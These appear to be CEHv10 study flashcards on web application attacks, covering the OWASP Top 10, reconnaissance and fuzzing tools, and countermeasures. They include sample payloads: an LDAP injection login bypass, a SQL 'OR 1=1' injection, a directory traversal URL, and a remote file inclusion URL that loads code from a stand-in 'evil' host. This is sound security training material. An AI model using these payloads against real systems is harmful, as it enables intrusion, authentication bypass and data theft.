CEHv10: Hacking Web Applications
File Injection Attack
A technique used to exploit "dynamic file include" mechanisms in web applications. It exploits vulnerable scripts on server to use a remote file instead of trusted file from local file system
Web Crawling via Mozenda
It crawls through a website and harvests pages of information. The software support logins, result index, AJAX, borders, and others. other Tools o Octoparse o crawler4j o Giant Web Crawl
OWASP A3: Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII (Personal Identifiable Information). Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. Weak encryption code
Map the Attack Surface
Once attackers detect the entry points, server-side technologies, and functionalities, they then find their respective vulnerabilities and plan their attack surface area of the target web app. Web application analysis thus helps attackers reduce their attack surface. Attackers consider the following factors to plan their attack.
Steps of Fuzz Testing
Steps involved in performing attack - Identify the target system - Identify inputs - Generate fuzzed data - Execute the test using fuzz data - Monitor system behavior - Log defects
Server ID/Banner Grabbing
Through this, attackers identify the name and/or version of a server, operating system, or application. Telnet Netcat ID Serve Netcraft
Fuzz Testing Tools
WSFuzzer WebScarab Burp Suite AppScan Peach Fuzzer
Vulnerability Stack
Attackers make use of vulnerabilities of one or more elements among the seven levels to exploit them and gain unrestricted access to an application or to the entire network. Layer 7 -Business Logic flaws Technical Vulnerability -exploit vulnerabilities by performing input validation attacks such as XSS Layer 6 - Open source/Commercial -Third-party components are services that integrate with the website to achieve certain functionality -exploit this redirection and use this as a medium/pathway to enter Amazon.com and exploit it. Layer 5 - Apache/ Microsoft IIS -Attackers can employ footprinting on a webserver, which hosts the target website and grab banners that contain information such as the web server name and its version Layeer 4 - Oracle/ MysQL/ MS SQL -Databases store sensitive user information such as user IDs, passwords, phone numbers, and other particulars. Layer 3 - Windows/ Linux /OS X -Attackers scan an operating system to find open ports and vulnerabilities and develop viruses/backdoors to exploit them. Layer 2 - Routers / Switches -Attackers flood these switches with huge number of requests that exhaust the CAM table, leading it to behave like a hub. Layer 1 - IDS/IPS -intrusion detection systems, so that while exploiting the target, the IDS/IPS does not trigger any alarm
OWASP A9: Using Components w/ Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
OWASP A4: XML External Entity (XXE)
External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attac Server-side request forgery (SSRF) attack
Attack Authentication Mechanism
Generally, web applications authenticate users through authentication mechanisms such as login functionality. o Attackers can enumerate user names in two ways: verbose failure messages (need password and user name) and predictable user names (auto generates). o Passsword attack -THC-Hydra -cracker o Session Attack o Cookie Explitation o Cookie sniffing o Cookie reply - OWASP Zed Attack Proxy -L0phtCrack - cookie exploitation tools
OWASP A1: Injection
Injection flaws, such as SQL, command injection, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. SQL Injection- uses an ALL CAPS cmd syntax -most common Command Injection- shell, html, file injection -highly dangerous LDAP Injection- cn=GSnowden40 ou=IT dc=CEH dc=com
Watcher Web Security Tool
This tool is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. It acts as an assistant to the developer or pen-tester by quickly identifying issues that commonly lead to security problems in web apps. Integrate it into your test passes to achieve more coverage of security testing goals
Directory Traversal Countermeasure
o Define access rights to the protected areas of the website o Apply checks/hot fixes that prevent the exploitation of the vulnerability such as Unicode to affect the directory traversal o Web servers should be updated with security patches in a timely manner
Insecure Deserialization Countermeasure
o Validate untrusted input which is to be serialized to ensure serialized data contains only trusted classes o Deserialization of trusted data must cross a trust boundary o Developers must re-architect their applications o Avoid serialization for security-sensitive classes o Guard sensitive data during deserialization o Filter untrusted serial data o Duplicate Security Manager checks enforced in a class during serialization and deserialization o Understand the security permissions given to serialization and deserialization
More Web Application Threats
Cookie Snooping -Attackers use cookie snooping on victim systems to analyze users' surfing habits and sell that information to other attackers or to launch various attacks on the victims' web applications. Hidden Field Manipulation -Attackers attempting to compromise e-commerce websites mostly use these types of attacks. They manipulate hidden fields and change the data stored in them. Several online stores face this type of problem every day. -Attackers can alter prices and conclude transactions, designating the prices of their choice. Authentication Hijacking -To identify a user, every web application employs user identification method such as an ID and password. However, once attackers compromise a system, various malicious things such as session hijacking and user impersonation can occur. Obfuscation Application -Attackers usually work hard at hiding their attacks and avoid detection. -Network and host-based intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. -The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, Base64, or URL encoding. -Unicode is a method of representing letters, numbers, and special characters to properly display them, regardless of the application or underlying platform. Broken Session Management -When security-sensitive credentials such as passwords and other important data are not properly secured, attackers can easily compromise them. Broken Account Management -Vulnerable account management functions including account update, forgotten, or lost password recovery or reset and other similar functions might weaken valid authentication schemes. Denial-of-Service (DoS) -A denial-of-service or DoS attack, is an attack on the availability of a service, that reduces, restricts, or prevents accessibility of system resources to its legitimate users. For instance, a website related to a banking or email service is not able to function for a few hours or even days, resulting in loss of time and money.
Cookie/Session Poisoning
-By changing the information inside a cookie, attackers bypass the authentication process; once they gain control over a network, they can modify its content, use the system for a malicious attack, or steal information from users' systems. In this attack, the attacker sniffs the user's cookies and then modifies the cookie parameters and submits them to the web server. One of the easiest examples involves using the cookie directly for authentication.
Analyze Web Applications
1. The first step in analyzing a web app is to check for the application entry point, which can later serve as a gateway for attacks 2. Identify Server-Side Technologies: Server-side technologies or server-side scripting systems are used to generate dynamic web pages (web 2.0) requested by clients and are stored internally on the server. 3. Identify Server-Side Functionality: Server-side functionality refers to the ability of a server to execute programs on output web pages. User requests stimulate the scripts residing on the web server to display interactive web pages or websites. The server executes server-side scripts, which are invisible to the user. 4. Map the Attack Surface: Attackers then plan the attack surface area of the web app to target the specific, vulnerable area. Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one
Web Applications
A software programs that run on web browsers and act as the interface between users and web servers through web pages. Though these have certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking,
Bypass Client-side Control
A web application requires client side controls to restrict user inputs in transmitting data via client components and implementing measures on controlling the user's interaction with his or her own client. Techniques to bypass the client-side controls: - Attack Hidden Form Fields: Identify hidden form fields in the web page and manipulate the tags and fields to exploit the web page before transmitting the data to the server. - Attack Browser Extensions: Attempt to intercept the traffic from the browser extensions or decompile the browser extensions to capture user data. - Perform Source Code Review: Perform source code review to identify vulnerabilities in the code that cannot be identified by the traditional vulnerability scanning tools.
Web Services Atk
A web service can interact directly with the web application without the need for an interactive user session or a browser. -Attacker can get into the target web applications by exploiting an application integrated with vulnerable web services. An attacker injects a malicious script into a web service and is able to disclose and modify application data
Burp Suite
An integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. It contains key components such as an intercepting proxy, application-aware spider, advanced web application scanner, intruder tool, repeater tool, sequencer tool, and more.
Identify Server-side Technologies
Analyze HTTP headers & HTML source code Examine URLs, error page messages, session tokens httprint -is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings or by plug-ins such as mod_security or servermask
OWASP A2: Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume other users' identities (temporarily or permanentl Session ID in URLs Pwd Exploit Timeout Exploit
Identify Entry Points for User Input
Attackers examine URL, HTTP Header, query string parameters, POST data, and cookies to determine all user input fields. Use the following tools to analyze the web application: httprint (http://www.net-square.com) Burp Suite (https://portswigger.net) WebScarab (https://www.owasp.org) OWASP Zed Attack Proxy (https://www.owasp.org) GNU Wget (https://www.gnu.org)
Web Services Footprinting Attack
Attackers use the Universal Business Registry (UBR) as major source to gather information of web services, as it is very useful for both businesses and individuals Attackers can footprint a web application to obtain any or all of these UDDI information structures -XML Query -XML Response
Hidden Field Manipulation
Attackers use these against e-commerce websites, as most of these sites have hidden fields in price and discount specifications. the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields, HTML code GET or POST
Attack Database Connectivity
Attacking data connectivity can result in unauthorized control over the database. Attacks on data connectivity provide attackers with access to sensitive database information. Database connectivity attacks exploit the way applications connected to the database instead of abusing database queries Example of a common connection string used to connect to a Microsoft SQL Server database: *"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"*
Even more Web Application Threats
Buffer Overflow -A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size. CAPTCHA Attacks -CAPTCHA is a challenge-response type test implemented by the web applications to ensure whether the response is generated by the computer or not. Though these CAPTCHAs are designed to be unbreakable, these are prone to various types of attacks. Platform Exploits -Users can build various web applications by using different platforms such as BEA Web logic and Cold Fusion. Each platform has its various vulnerabilities and exploits associated with it. Network Access Attacks -Network access attacks can majorly affect web applications, including basic level of service. They can also allow levels of access that standard HTTP application methods could not grant. DMZ Protocol Attacks -The DMZ ("demilitarized zone") is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. -An attacker, who is able to compromise a system that allows other DMZ protocols, has access to other DMZs and internal systems.
Detecting WAF and Proxies on Target Site
By applying footprinting techniques, the attempt would provide its proxy IP address, not its legitimate address. - use TRACE method Web app firewalls (WAFs) are security devices deployed between the client and server. These devices are like intrusion prevention systems that provide security for web applications against a wide range of attacks WAFW00F - allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website. It detects the WAF at any domain
Service Discovery
Footprinting the web infrastructure provides data about the services offered, such as exchange and encryption of data, path of transmission, and protocols deployed. nmap -A multi-platform, multi-purpose applications used to perform footprinting of ports, services, operating systems, etc. -It is used for network discovery and security auditing. o NetScan Tools Pro o Sandcat Browser
Example of LDAP
If an attacker enters valid user name "certifiedhacker" and injects *certifiedhacker)(&))* then the URL string becomes *(&(USER=certifiedhacker)(&))(PASS=blah))* only the first filter is processed by the LDAP server, only the query *(&(USER=certifiedhacker)(&))* is processed. This query is always true, and the attacker logs into the system without a valid password
Attack Application Logic Flaws
In all web applications, vast amount of logic is applied at every level. Implementation of some logics can be vulnerable to various attacks and will not be noticeable. Most of the application flaws arise due to the negligence and false assumptions of the developers. Application logic flaw differs with different type of web applications and is not restricted to a particular flaw. -Scenario: Identify and exploit Logic Flaws in retail web applications
Attack Authorization Schemes
In this attack, the attacker first finds a legitimate account with limited privileges, then logs in as that user, and gradually escalates privileges to access protected resources. Attackers use sources such as uniform resource identifiers, parameter tampering, POST data, HTTP headers, query strings, cookies, and hidden tags to perform authorization attack
How to Defend Against LDAP Injection Attacks
Injection attack is similar to SQL injection: attacks on web apps co-opt user input to create LDAP queries o Perform type, pattern, and domain value validation on all input data o Make LDAP filter as specific as possible o Validate and restrict the amount of data returned to the user o Implement tight access control on the data in the LDAP directory o Perform dynamic testing and source code analysis
Perform Injection Attacks
Injection attacks are very common in web applications; they exploit the vulnerable input validation mechanism implemented by the web application. Types o Web Scripts Injection: If user input is used into dynamically executed code, enter crafted input that breaks the intended data context and executes commands on the server. o OS Commands Injection: Exploit operating systems by entering malicious codes in input fields if applications utilize user input in a system-level command. o SMTP Injection: Inject arbitrary STMP commands into application and SMTP server conversation to generate large volumes of spam email. o SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database. o LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases. o XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic. o Buffer Overflow: Injects large amount of bogus data beyond the capacity of the input field. o Canonicalization: Manipulate variables that reference files with "dot-dot-slash (../)" to access restricted directories in the application
OWASP A10: Insufficient Logging/Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
Web Spidering Using Burp Suite
It is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. It allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. Configure -> Proxy intercept -> intercept off -> visiting every single link/URL -> Target -> Spider this host /branch -> confirm -> Yes
Web 2.0 Applications
It refers to technologies that use dynamic web pages, thus superseding the Web 1.0 technology, which used static HTML web pages -Latest generation of web apps facilities Interoperability o Blogs (Wordpress) o Advanced gaming o Dynamic as opposed to static site content o RSS-generated syndication User-centered Design o Social networking sites (Facebook, Twitter, LinkedIn, etc.) o Mash-ups (Emails, IMs, Electronic payment systems) o Wikis and other collaborative applications o Google Base and other free Web services (Google Maps) Collaboration on the Web o Cloud computing websites like (amazon.com) o Interactive encyclopedias and dictionaries o Online office software (Google Docs and Microsoft Silverlight) o Ease of data creation, modification, or deletion by individual users Interactive Data Sharing o New technologies like AJAX (Gmail, YouTube) o Mobile application (iPhone) o Flash rich interface websites o Frameworks (Yahoo! UI Library, jQuery)
Fuzz Testing Strategies
Mutation-Based: -In this type of testing, the current data samples creates new test data and the new test data will again mutate to generate further random data. This type of testing starts with a valid sample and keeps mutating until the target is reached. Generation-Based: -In this type of testing, the new data will be generated from scratch and the amount of data to be generated are predefined based on the testing model Protocol-Based: - In this type of testing, protocol fuzzer sends forged packets to the target application that is to be tested. -This type of testing requires detailed knowledge of protocol format being tested. -This type of testing involves writing a list of specifications into the fuzzer tool and then performing the model based test generation technique to go through all the listed specifications and add the irregularities in the data contents, sequence etc.
ID Server-side Functionality
Once server-side technologies are determined, attackers try to identify server-side functionality for the purpose of finding potential vulnerabilities. They examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications. o GNU Wget -is for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support. o BlackWidow (http://softbytelabs.com) o Teleport Pro (http://www.tenmax.com)
OWASP A5: Broken Access Control
Restrictions on what authenticated users are allowed to do are not properly enforced -Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc Privilege escalation
Web Services XML Poisoning
This is similar to an SQL injection attack. Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic.
Types of command injection attacks
Shell Injection o An attacker tries to craft an input string to gain shell access to a web server o Shell Injection functions include *system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start()*, and similar APIs HTML Embedding o This type of attack is used to deface websites virtually. Using this attack, an attacker adds an extra HTML-based content to the vulnerable web application o In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting File Injection o The attacker exploits this vulnerability and injects malicious code into system files *http://www.certifiedhacker.com/vulnerable.php?COLOR=http: //evil/exploit?*
Web Service Attack Tools
SoapUI Pro -a web service testing tool which supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. Attacker can use this tool to carry out web services probing, SOAP injection, XML injection, and web services parsing attacks Altova XMLSpy -is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies.
Web Application Pen testing
Step 1: Define objective You should define the aim of the penetration test before conducting it. This would help you to move in right direction towards your aim of penetration test. Step 2: Information gathering You should gather as much information as possible about your target system or network. Step 3: Configuration management testing Most web application attacks occur because of improper configuration. Therefore, you should conduct configuration management testing. This also helps you to protect against known vulnerabilities by installing the latest updates. Step 4: Authentication testing Test the authentication mechanism of the application by trying to bypass authentication mechanism anyway and to determine the possible exploits in it. Step 5: Session management testing Perform session management testing to check your web application against various attacks that attacker carries out on session ID such as session hijacking, session fixation, and so on. Step 6: Denial-of-service testing Send a vast amount of requests to the web application until the server is saturated. Analyze the behavior of application when the server is saturated. In this way, you can test your web application against denial-of-service attacks. Step 7: Data validation testing Failing to adopt a proper data validation method is a common security weakness observed in most web applications, which can further lead to major vulnerabilities. Thus, before a hacker finds those vulnerabilities and exploits your application, you must perform data validation testing and protect it. Step 8: Business logic testing Web application security flaws may be present even in the context of business logic, such as improper error handling. Try to exploit such flaws. Attackers may do something that a business does not allow, which could in turn lead to great financial losses. Testing business logic for security flaws often requires unconventional thinking. Step 9: Authorization testing Analyze how a web application authorizes users, then try to find and exploit the vulnerabilities present in the authorization mechanism. For example, once authenticated by the application, you should try to escalate your privileges to access sensitive areas such as an admin page. Step 10: Web services testing Web services use HTTP protocol in conjunction with SML, WSDL, SOAP, and UDDI technologies. Therefore, they have XML parser-related vulnerabilities in addition to SQL injection, information disclosure, and so on. You should conduct web services testing to determine their vulnerabilities. Step 11: AJAX testing Though developers develop more responsive web applications using AJAX, it is likely that they are just as vulnerable as traditional web applications. Testing for AJAX is challenging, because developers are given full freedom to design the method of client-server communication. Step 12: Document all the findings Once you conduct all the tests mentioned above, document all your findings and the testing techniques you employed at each step. Analyze the document, explain the current security posture to the concerned parties, and suggest how they can enhance their security.
Attack Access Control
The part of application's security mechanisms which logically built on authentication and session management. o Parameter-Based Access Control: -Any web application consists of various request parameters like cookies, query string parameters, etc. The application decides the access grant to a request based on these parameters o Referer-Based Access Control: -In some web-applications, HTTP referrer is the foundation to make major access control decisions. -As Http referrer is considered unsafe, attacker uses HTTP referrer and manipulates it to any value o Location-Based Access Control: -The users geographic location can be determined by various methods. The most common method to determine current location is through IP address. -Attackers can bypass location based access controls by using a web-proxy's, a VPN, a data roaming enabled mobile device, direct manipulation of mechanisms, etc
Encoding Schemes
The process of converting source information into its equivalent symbolic form, which helps in hiding the meaning of data. Types o URL Encoding - "%" followed by the character's two-digit ASCII code expressed in hexadecimal such as: - %3d ( = ) -%0a ( New line ) - %20 ( space ) o HTML Encoding - used to represent unusual characters so that they can be safely combined within an HTML document. -& ( & ) -< ( < ) -> ( > ) o Unicode encoding - is of two types: 16 bit Unicode Encoding and UTF-8. -16 bit Unicode Encoding - It replaces unusual Unicode characters with "%u" followed by the character's Unicode codepoint expressed in hexadecimal. -UTF-8 - It is a variable-length encoding standard which uses each byte expressed in hexadecimal and preceded by the % prefix. Base64 encoding scheme - represents any binary data using only printable ASCII characters. Usually it is used for encoding email attachments for safe transmission over SMTP and also used for encoding user credentials. Hex Encoding - HTML encoding scheme uses hex value of every character to represent a collection of characters for transmitting binary data.
How to Defend Against Command Injection Flaws
The simplest way to protect against it s is to avoid them wherever possible. o Perform input validation o Escape dangerous characters o Use language-specific libraries that avoid problems due to shell commands o Perform input and output encoding o Use a safe API which avoids the use of the interpreter entirely o Structure requests so that all supplied parameters are treated as data, rather than potentially executable content o Use parameterized SQL queries o Use modular shell disassociation from kernel
OWASP A8: Insecure Deserialization
These flaws occur when an application receives hostile serialized objects. -leads to remote code execution. Attackers inject malicious code into serialized linear formatted data and forward the malicious serialized data to the victim. Due to insecure deserialization, the injected malicious code will be undetected and will be present in the final execution of deserialization code. Data serialization (graphic -> code) and deserialization (code -> graphic) is an effective process of linearizing and de-linearizing data objects in order to transport it to other networks or systems Deserialization is the reverse process of serialization, where the recreation of the object data from the linear serialized data format takes place.
Hidden Content Discovery
This allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc. Web Spidering -Web spiders automatically discover the hidden content and functionality by parsing HTML form and client-side JavaScript requests and responses o OWASP Zed Attack proxy-Attacker Directed o Burp Suite - Brute Force -to make huge numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality. o WebScarab o Scrapy
LDAP injection attack
This directory services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. (Lightweight Directory Access Protocol) is based on the client-server model and clients can search the directory entries using filters.
Unvalidated Redirects and Forwards
This enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass -Attackers lure victim and make them click on unvalidated links that appear to be legitimate. -Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass, leading to: o Session Fixation Attack o Security Management Exploits o Failure to Restrict URL Access o Malicious File Execution
Directory Traversal
This gives them access to restricted directories; they execute commands outside the web server's root directory. This attack exposes the directory structure of an application and often the underlying web server and operating system. Example: The following example uses "../" to go back several directories and obtain a file containing the backup of a web application: http://www.targetsite.com/../../../sitebackup.zip
Web Application Architecture
This includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. It is comprises of three layers: 1. Client or presentation layer 2. Business logic layer 3. Database Layer
Attack Session Management Mechanism
This involves exchanging sensitive information between the server and its clients wherever required. Session prediction is the time, when attackers identify a pattern in the session token exchanged between client and server. This can happen when the web application has weak predictable session identifiers. For example, when the web application assigns a session token sequentially, attackers can predict the previous and next session tokens by knowing any one session ID. Before predicting a session identifier, attackers have to obtain enough valid session tokens for legitimate system users. sniffing session id - wireshark
WebScarab
This is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It allows the attacker to review and modify requests created by the browser before they are sent to the server and to review and modify responses returned from the server before they are received by the browser. This framework has the following plugins: o Fragments o Proxy o Manual intercept o Beanshell o Bandwidth simulator o Spider o SessionID analysis o Parameter "fuzzer" o SOAP o XSS/CRLF
Waterhole Attack
This is a type of unvalidated redirect attack where the attacker first identifies the most visited website of the target, identifies the vulnerabilities in the website, injects malicious code into the vulnerable web application, and waits for the victim to browse the website. Once the victim tries to access the website, the malicious code executes infecting the victim.
OWASP A6: Security Misconfiguration
This is the most common issue in the web security, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all). -Unvalidated inputs -Parameter/Form tampering -Improper Error Handling -Insufficient Transport Layer Protection
Client or presentation layer
This layer of the Web Application Architecture includes all physical devices present on the client side, such as laptops, smart phones, and computers.
Database Layer
This layer of the Web Application Architecture is comprised of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization's production data in structured form (e.g., MS SQL Server, MySQL server).
Business logic layer
This layer of the Web Application Architecture is comprised of two layers: the web-server logic layer and the business logic layer. The web-server logic layer contains various components, such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler and resource handler, and a hardware component-like server -The web-server logic layer holds all coding that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server). The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and "middleware" technologies. -It stores the application data and integrates legacy applications with the latest functionality of the application.
Cross-Site Request Forgery (CSRF or XSRF) Attack
This method is a kind of attack in which an authenticated user is made to perform certain tasks on the web application that an attackers chooses. For example, a user clicking on a particular link sent through an email or chat. Also known as a one-click attack, occurs when a hacker instructs a user's web browser to send a request to the vulnerable website through a malicious web page. Financially related websites commonly contain CSRF vulnerabilities.
SQL injection attack
This occurs when users enter a SQL statement into a form in which they are supposed to enter a name or other data For example, the following SQL statement, *SELECT * FROM tablename WHERE UserID= 2302* becomes the following with a simple SQL injection attack: *SELECT * FROM tablename WHERE UserID= 2302 OR 1=1* The expression *"OR 1=1"* evaluates to the value *"TRUE*," often allowing the enumeration of all user ID values from the database.
Acunetix Web Vulnerability Scanner
This tool checks web applications for SQL injections, cross-site scripting, etc. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. Port scans a web server and runs security checks against network services. Tests web forms and password-protected areas. It includes an automatic client script analyzer allowing for security testing of Ajax and Web 2.0 apps.
Netsparker
This tool finds and reports web application vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) on all types of web applications regardless of the platform and technology they are built with. Features: o Automatic Detection: Automatically detect XSS, SQL Injection and other web application vulnerabilities. o Dead Accurate: Use your time fixing vulnerabilities and not verifying the scanner's findings. o Scalable: Easily scan 100s and 1000s of web applications simultaneously with a fully scalable service. o Integration: Easily integrate web security scanning in the SDLC and continuous development systems.
CookieDigger
This tool helps identify weak cookie generation and insecure implementations of session management by web applications. It works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values
Server Discovery
To footprint a web infrastructure, first you need to discover active Internet servers. Three techniques—namely, whois lookup, DNS interrogation, and port scanning—help in discovering the active servers and their associated information. whois -Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries. o Netcraft o SmartWhois o DNSstuff Toolbox DNS interrogation -a distributed database used to connect their IP addresses with their respective hostnames and vice-versa -It provides information about the location and type of servers. o DNSstuff Toolbox o Network-Tools.com o Dig o NsLookup Port scan -It attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. o Nmap oNetScan o Hping o Advanced port scanner
dotDefender
Web Application firewall This s a software based Web Application Firewall that protects your website from malicious attacks such as SQL injection, path traversal, cross-site scripting, and others that result in web site defacement. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior. Features: o Handle .NET Security issues o Enterprise-class security against known and emerging hacking attacks o Solutions for hosting, enterprise, and SMB/SME o Supports multiple platforms and technologies (IIS, Apache, Cloud, etc.) o Open API for integration with management platforms and other applications o Prevents denial-of-service (DoS) attacks
Attack Web Services
Web Services Probing -Attacks WSDL files are automated documents comprised of sensitive information about service ports, connections formed between two electronic machines, and so on. Attackers can use WSDL probing attacks to obtain information about the vulnerabilities in public and private web services, as well as to allow them to perform an SQL attack Web Service Attacks: -SOAP Injection Simple Object Access Protocol (SOAP) is a lightweight and simple XML-based protocol designed to exchange structured and type information on the web. Web Service Attacks: -XML Injection Web applications sometimes use XML to store data such as user credentials in XML documents; attackers can parse and view such data using XPATH. XPATH defines the flow of the document and verifies user credentials, such as the username and password, to redirect to a specific user account Web Services Parsing - Attacks Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service attack or generate logical errors in web service request processing. -A parsing attack is faced when an attacker succeeds in modifying a file request or string. The attacker changes the values by superimposing one or more operating system commands via the request. Parsing is possible when the attacker executes the .bat (batch) or .cmd (command) files
Attack Web Servers
Web server vulnerabilities provide attackers with a path to exploit the web apps hosted on them o WebInspect -an automated and configurable web application security and penetration-testing tool that mimics real-world hacking techniques and attacks, enabling attackers to analyze the complex web applications and services for security vulnerabilities. Metasploit Nikto Nessus Acunetix
Command Injection Attack
When input is used in the construction of a command that is subsequently executed by the system with the privileges of the Web server Theses flaws allow attackers to pass malicious code to different systems via web applications
OWASP A7: Cross-site Scripting Atk (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or it updates an existing web page with user supplied data using a browser API that can create JavaScript. -It allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites -It occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering. can be used -attack emails -Stealing User cookies -Sending an Unauthorized Request XSSed archive
Waterhole attack countermeasures
o Apply software patches regularly to remove any vulnerabilities o Monitor network traffic o Secure DNS server to prevent attackers from redirecting the site to new location o Analyze user behavior o Inspect popular websites o Use browser plug-ins that block HTTP redirects o Disable third party content such as advertising services, which track user activities
Access Controls Attack Methods
o Attack with different user accounts: o Attack Multistage Processes: -In a multistage process, multiple requests will be sent to the server from the client. To attack such process, each and every request to the server should be captured and tested for access controls. o Attack Static Resource -Identifies the web applications where the protected static resources are accessed by the URLs. Attempt to request these URLs directly and check whether it is providing access to unauthorized users o Attack Direct Access Methods -Web applications accept certain requests that provide direct access to server side APIs. If there are any access control weaknesses in these direct access methods, an attacker can exploit the weakness and compromise the system. o Attack Restrictions on HTTP Methods: -It is important to test different HTTP methods such as GET, POST, PUT, DELETE, TRACE, OPTIONS, etc. -Attacker modifies the HTTP methods to compromise web applications. If the web application accepts these modified requests, this can bypass access controls
XML External Entity Countermeasures
o Avoid processing XML input containing reference to external entity by weakly configured XML parser o XML unmarshaller should be configured securely o Parse the document with a securely configured parser o Configure the XML processor to use local static DTD and disable any declared DTD included in XML document o Disable DOCTYPE tag or use input validation to block input containing it
Web Service Attack Countermeasures
o Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages o Use document-centric authentication credentials that use SAML o Use multiple security credentials such as X.509 Cert, SAML assertions, and WS-Security o Deploy web services-capable firewalls capable of SOAP and ISAPI level filtering o Configure firewalls/IDS systems for a web services anomaly and signature detection o Configure firewalls/IDS systems to filter improper SOAP and XML syntax o Implement centralized in-line requests and responses schema validation o Block external references and use pre-fetched content when de-referencing URLs o Maintain and update a secure repository of XML schemas
Security Misconfiguration Countermeasures
o Configure all security mechanisms and disable all unused services o Setup roles, permissions, and accounts and disable all default accounts or change their default passwords o Scan for latest security vulnerabilities and apply the latest security patches o Non-SSL requests to web pages should be redirected to the SSL page o Set the 'secure' flag on all sensitive cookies o Configure SSL provider to support only strong algorithms o Ensure the certificate is valid, not expired, and matches all domains used by the site o Backend and other connections should also use SSL or other encryption technologies
Different types of data connectivity attacks
o Connection String Injection: -A delegated authentication environment in which attackers inject parameters in a connection string by appending them with the semicolon. This can occur when dynamic string concatenation is used to build connection strings according to user input. o Connection String Parameter Pollution (CSPP) Attacks: -Attackers overwrite parameter values in the connection string. --hash stealing --port scanning --hijacking web credentals o Connection Pool DoS: Attackers examine the connection pooling settings of the target application, construct a large malicious SQL query, and run multiple queries simultaneously to consume all connections in the connection pool, in turn causing database queries to fail for legitimate users
Attack Web App Client
o Cross-Site Scripting o Redirection Attacks o HTTP Header Injection o Frame Injection o Request Forgery Attack o Session Fixation: o Privacy Attacks: o ActiveX Attacks -Attackers lure victims via email or via a link that attackers have constructed in such a way that loopholes of remote execution code become accessible, allowing the attackers to obtain access privileges equal to that of an authorized user
Other Web Application Threats
